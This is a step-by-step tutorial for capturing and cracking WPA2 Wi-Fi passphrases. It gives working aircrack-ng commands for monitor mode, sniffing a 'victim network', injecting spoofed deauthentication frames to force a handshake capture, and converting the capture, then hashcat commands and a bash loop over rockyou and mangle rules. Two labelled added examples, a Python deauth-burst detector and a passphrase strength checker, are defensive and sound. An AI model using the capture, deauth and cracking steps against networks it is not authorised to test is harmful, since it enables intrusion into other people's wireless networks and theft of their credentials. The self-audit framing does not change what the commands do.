
Cracking WPA2 Passphrases

Purpose

Weaknesses in the WPA2 protocol used to secure wireless networks have been known since 2016. Obtaining and cracking a weak WPA2 passphrase with off-the-shelf gear and free software is trivial, provided you have radio access to the network.

This guide explains how to locate your wireless network, perform a de-authentication attack on a client connected to the network, sniff and save the re-authentication, and brute-force the captured authentication values. If you can obtain your wireless passphrase using this method, change your wireless passphrase now.

Your only easy defense against this type of attack is to use strong WPA2 passphrases. This makes it computationally expensive to brute-force your passphrase, which dissuades most attackers. Corporations use VPNs and additional layers of security to protect their assets from wireless attacks of this nature. Virtually no one implements this on their home networks.


Requirements

You'll need some system running Linux (preferably Kali) with a wireless interface to interact with wireless networks. Any system will work. This guide uses a Raspberry Pi Zero W.

Once you have interacted with the wireless network and obtained a hash value, you'll need a system running Linux with an Nvidia GPU and the Nvidia drivers installed to run Hashcat with Nvidia support. You can do this step without an Nvidia card, but CPUs will take significantly longer to complete a run than the same job on a GPU.

To complete this guide, you'll need the following software. Install it on your Linux machine(s) if you are not using Kali.

  • Aircrack-ng for sniffing/injecting/capturing wireless traffic -- on the system used to sniff wireless traffic
  • Hashcat for brute-forcing the captured WPA2 hash -- on the system with the Nvidia gear
  • RockYou Wordlist to feed to Hashcat when brute-forcing the hash -- on the system with the Nvidia gear

You can use the onboard wireless adapter on the Pi or an external USB wireless adapter if you need to extend your range. Kismet has a list of known-good chipsets for use with Aircrack-ng. Putting the antenna in a Pringles can turns it into a shotgun/directional antenna.

You will:

  • use airmon-ng to set up the wireless interface
  • use airodump-ng to locate the target network
  • sniff and capture the target network's traffic using airodump-ng
  • inject de-authentication frames using aireplay-ng
  • convert the file to a HashCat-compatible format using hcxpcapngtool
  • use hashcat to brute-force the WPA2 hash using wordlists and mangle rules

Capturing with Aircrack-ng

Boot your system into Kali and open a shell.


Kill Conflicting Processes

Make sure there are no conflicting processes like NetworkManager running:

airmon-ng check
airmon-ng check kill

Start Monitoring Mode on the Wireless Adapter

Before sniffing and injecting, the wireless interface must be 'started' with airmon-ng:

airmon-ng start wlan1

Swap wlan1 with whatever wireless interface you use to sniff traffic.

This creates a wlan1mon virtual interface that the aircrack-ng tools will use.


Sniff for Available Wireless Networks Nearby

Start an airodump-ng sniffing session that shows interesting information for neighboring wireless networks:

  • all the visible wireless networks
  • BSSID for any visible SSIDs
  • channel for each SSID
  • packet count per SSID

airodump-ng wlan1mon

(hit s to change sort order, by packets is best)

Once you locate an SSID that has a decent traffic pattern, record the BSSID and note the channel.

Stop airodump-ng (Ctrl-C) and open a second shell.


Sniff and Capture Traffic on the Victim Network

Start a sniff/capture session for the target network. Specify the channel and BSSID for the target network.

Run airodump-ng with the parameters:

airodump-ng -c CHANNEL --bssid BSSID -w /output/dir/capturefile wlan1mon

Watch for traffic/clients at the bottom of the screen. Record the MAC of a client that is regularly passing traffic.


Inject De-authentication Frames on the Victim Network

Inject de-authentication frames into the target network and spoof the client MAC. This step de-authenticates the client from the wireless network. The client will automatically re-authenticate, which is what you are attempting to capture:

aireplay-ng -0 30 -a BSSID wlan1mon -c CLIENT-MAC

Loop this until you see WPA handshake: BSSID in the top-right corner of the airodump-ng screen. This message indicates that you've seen and captured a WPA2 authentication session.

Kill both airodump-ng and aireplay-ng. You have captured a WPA2 4-way authentication session that can be cracked using HashCat.
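From the defender's side, the de-authentication step above has a clear on-air signature: a burst of deauthentication management frames addressed to one station. The following detector is an added example, not code from this guide or from the aircrack-ng project. It parses raw 802.11 management headers from the bytes a monitor-mode capture would deliver, counts deauth frames per (receiver, BSSID) pair in a sliding window, and raises one alert per pair that crosses a threshold. All frames and MAC addresses below are constructed placeholders, and the window and threshold values are assumptions to tune for your environment. (Protected Management Frames, 802.11w, are the protocol-level mitigation that makes forged deauth frames unusable; this script only detects the attempt.)

```python
"""Rate-based detector for 802.11 de-authentication bursts (added example,
not part of the original guide). Frames and addresses are constructed."""
from collections import defaultdict, deque

FC_TYPE_MGMT = 0          # frame-control type value for management frames
FC_SUBTYPE_DEAUTH = 12    # management subtype 12 = deauthentication
FC_SUBTYPE_BEACON = 8     # management subtype 8 = beacon

# Constructed placeholder addresses (locally administered, not real devices)
AP = "02:00:00:00:aa:01"
STA = "02:00:00:00:bb:02"
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(s: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(s.replace(":", ""))


def parse_frame(frame: bytes):
    """Return (ftype, subtype, addr1, addr2, addr3, reason) for a raw 802.11
    frame, or None if it is shorter than the 24-byte MAC header. reason is the
    little-endian reason code for deauth frames and None for anything else."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    addr1 = frame[4:10].hex(":")     # receiver address
    addr2 = frame[10:16].hex(":")    # transmitter address
    addr3 = frame[16:22].hex(":")    # BSSID for management frames
    reason = None
    if ftype == FC_TYPE_MGMT and subtype == FC_SUBTYPE_DEAUTH and len(frame) >= 26:
        reason = int.from_bytes(frame[24:26], "little")
    return ftype, subtype, addr1, addr2, addr3, reason


def detect_deauth_bursts(frames, window_s=1.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes) in time order.
    Keeps a sliding window of deauth timestamps per (receiver, BSSID) pair and
    returns one alert (window_start, receiver, bssid, count) per pair whose
    count reaches `threshold` within `window_s` seconds."""
    recent = defaultdict(deque)   # (receiver, bssid) -> timestamps in window
    alerted = set()
    alerts = []
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed is None:
            continue
        ftype, subtype, addr1, _addr2, bssid, _reason = parsed
        if ftype != FC_TYPE_MGMT or subtype != FC_SUBTYPE_DEAUTH:
            continue
        key = (addr1, bssid)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_s:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((q[0], addr1, bssid, len(q)))
    return alerts


def build_deauth(dst: str, src: str, bssid: str, reason: int = 7) -> bytes:
    """Constructed deauth frame: frame control 0xC0 0x00, duration 0, the three
    addresses, sequence control 0, then a little-endian reason code."""
    return (bytes([0xC0, 0x00, 0x00, 0x00]) + mac(dst) + mac(src) + mac(bssid)
            + b"\x00\x00" + reason.to_bytes(2, "little"))


# Constructed beacon (subtype 8) so the detector has a non-deauth frame to skip
BEACON = bytes([0x80, 0x00, 0x00, 0x00]) + mac(BROADCAST) + mac(AP) + mac(AP) + b"\x00\x00"


def sample_capture():
    """Constructed capture: a beacon, one isolated deauth (benign roaming-style
    event), then a burst of 30 deauths in 0.6 s aimed at the same client."""
    frames = [(0.0, BEACON), (0.2, build_deauth(STA, AP, AP))]
    frames += [(5.0 + i * 0.02, build_deauth(STA, AP, AP)) for i in range(30)]
    return frames


if __name__ == "__main__":
    for start, receiver, bssid, count in detect_deauth_bursts(sample_capture()):
        print(f"deauth burst at t={start:.2f}s: {count} frames to {receiver} on BSSID {bssid}")
```

In a real deployment the frames would come from a monitor-mode interface (for example via a pcap reader) rather than the constructed list; the single isolated deauth at t=0.2 s stays below the threshold, while the burst triggers exactly one alert.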


Converting Capture for Use with Hashcat

The .cap file must be converted to the .hc22000 file format before it can be cracked with HashCat.

hcxpcapngtool -o outputfile.hc22000 inputfile.cap

Alternatively, use the online Hashcat Converter Tool.


Cracking WPA2 with Hashcat

HashCat takes a wordlist and, optionally, a set of mangle rules that govern how the words in the wordlist are mutated.

Wordlist Locations

Kali includes wordlists in the default install.

locate wordlists

Or look in /usr/share/wordlists/.

The RockYou Wordlist is excellent and used in this guide.


HashCat with a Wordlist

Using Hashcat to check every value in the wordlist against the captured hash is easy and fast, but it only tries the values in the list.

./hashcat.bin -m 22000 capfile.hc22000 -a0 wordlist.txt

Using a Wordlist with Mangle Rules

Hashcat's mangle rules apply a series of transformations (case changes, character substitution, appending or prepending characters, rotation, and similar string mutations) to each wordlist entry before hashing. This greatly increases the number of candidate values to try and mimics what humans do to obfuscate or change a known password.

./hashcat.bin -m 22000 capfile.hc22000 -a0 wordlist.txt -r rules/best64.rule
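The reason mangle rules work is that most "modified" passphrases are a dictionary word plus a handful of predictable mutations, which is also why the only easy defense noted in the Purpose section is a genuinely strong passphrase. The checker below is an added example, not code from this guide or from the hashcat project: it undoes the most common mutations (case changes, trailing or leading digits and symbols, leetspeak) and looks the base word up, so a passphrase that a wordlist-plus-rules run would recover is rejected before it is ever put on a network. The wordlist is a constructed stand-in for rockyou.txt, and the 16-character minimum and the leet substitution table are assumptions.

```python
"""Passphrase policy check against a wordlist plus common manglings (added
example, not from the original guide). Wordlist and thresholds are assumptions."""
import math
import re
import string

# Constructed stand-in for a real wordlist such as rockyou.txt
SAMPLE_WORDLIST = {"password", "sunshine", "iloveyou", "princess", "welcome", "dragon"}

# Assumed leetspeak reversal table (digit/symbol -> letter it usually stands for)
LEET_MAP = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                          "7": "t", "@": "a", "$": "s", "!": "i"})


def base_words(candidate: str):
    """Yield the base words a rule set would plausibly have derived `candidate`
    from: lowercased, with leading/trailing digits and symbols stripped, and
    with leetspeak reversed. Each distinct form is yielded once."""
    lowered = candidate.lower()
    stripped = (
        lowered,
        re.sub(r"[\d\W_]+$", "", lowered),               # drop trailing 123!
        re.sub(r"^[\d\W_]+", "", lowered),               # drop leading !!
        re.sub(r"^[\d\W_]+|[\d\W_]+$", "", lowered),     # drop both
    )
    seen = set()
    for form in stripped:
        for variant in (form, form.translate(LEET_MAP)):
            if variant and variant not in seen:
                seen.add(variant)
                yield variant


def keyspace_bits(candidate: str) -> float:
    """Naive keyspace estimate: length * log2(size of the character classes
    used). Only meaningful for passphrases that survive the wordlist check."""
    classes = ((string.ascii_lowercase, 26), (string.ascii_uppercase, 26),
               (string.digits, 10), (string.punctuation, 32))
    alphabet = sum(size for chars, size in classes if any(c in chars for c in candidate))
    return len(candidate) * math.log2(alphabet) if alphabet else 0.0


def assess(candidate: str, wordlist=SAMPLE_WORDLIST, min_len=16):
    """Return (ok, reasons, bits). The passphrase fails if it is shorter than
    min_len (assumed policy) or any un-mangled form of it is in the wordlist."""
    reasons = []
    if len(candidate) < min_len:
        reasons.append(f"shorter than {min_len} characters")
    hits = [w for w in base_words(candidate) if w in wordlist]
    if hits:
        reasons.append(f"derived from wordlist entry '{hits[0]}'")
    return (not reasons, reasons, round(keyspace_bits(candidate), 1))


if __name__ == "__main__":
    for pw in ("P@ssw0rd123!", "Sunshine2024", "correct horse battery staple"):
        ok, reasons, bits = assess(pw)
        print(f"{pw!r}: {'OK' if ok else 'REJECT'} ({bits} bits) {'; '.join(reasons)}")
```

For a real deployment, load rockyou.txt (or the organisation's own banned-password list) into a set in place of SAMPLE_WORDLIST; the reversal step is deliberately generous, since it is cheaper to reject a borderline passphrase than to let one through that best64.rule would recover in under an hour.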

Viewing Cracked Passwords

Cracked password values can be viewed by running hashcat.bin --show on a capfile.

./hashcat.bin -m 22000 --show capfile.hc22000

Other Hashcat Rules

Since rules modify the number of permutations against a wordlist, they can greatly affect the time it takes Hashcat to complete a run.

Kali has several Hashcat rules available in /usr/share/hashcat/rules/.

On an Nvidia RTX-2080 SUPER, the RockYou wordlist takes wildly different times to complete when used with different rule files. For example, using Kali's built-in rule files with the RockYou wordlist:

Rules              Time
best64.rule        45 min
generated.rule     5 days
combinator.rule    20 min

Clem's HashCat Rules is a repo with additional rules for Hashcat.


Multi-Run Examples

Looping through multiple rule lists is simple with Bash:

#!/usr/bin/env bash
# Run the RockYou wordlist against one .hc22000 capture with several rule files.
# Usage: ./crack-using-rules.sh capfile.hc22000
set -u

if [ "$#" -ne 1 ]; then
    echo "usage: $0 capfile.hc22000" >&2
    exit 1
fi

HCFILE="$1"
WLPATH='/home/user/wordlists'
RULEPATH='/usr/share/hashcat/rules'

# Approximate times are from the table above (RTX-2080 SUPER, RockYou wordlist).
hashcat -m 22000 "${HCFILE}" -a 0 "${WLPATH}/rockyou.txt" -r "${RULEPATH}/best64.rule"     # 45min
hashcat -m 22000 "${HCFILE}" -a 0 "${WLPATH}/rockyou.txt" -r "${RULEPATH}/generated.rule"  # 5days
hashcat -m 22000 "${HCFILE}" -a 0 "${WLPATH}/rockyou.txt" -r "${RULEPATH}/combinator.rule" # 20min
hashcat -m 22000 "${HCFILE}" -a 0 "${WLPATH}/rockyou.txt" -r "${RULEPATH}/leetspeak.rule"  # not timed
hashcat -m 22000 "${HCFILE}" -a 0 "${WLPATH}/rockyou.txt" -r "${RULEPATH}/d3ad0ne.rule"    # not timed
hashcat -m 22000 "${HCFILE}" -a 0 "${WLPATH}/rockyou.txt" -r "${RULEPATH}/dive.rule"       # not timed

Save this file as crack-using-rules.sh, make it executable (chmod +x crack-using-rules.sh), and run it with:

./crack-using-rules.sh capfile.hc22000

After the runs are complete, view any recovered values:

./hashcat.bin -m 22000 --show capfile.hc22000

References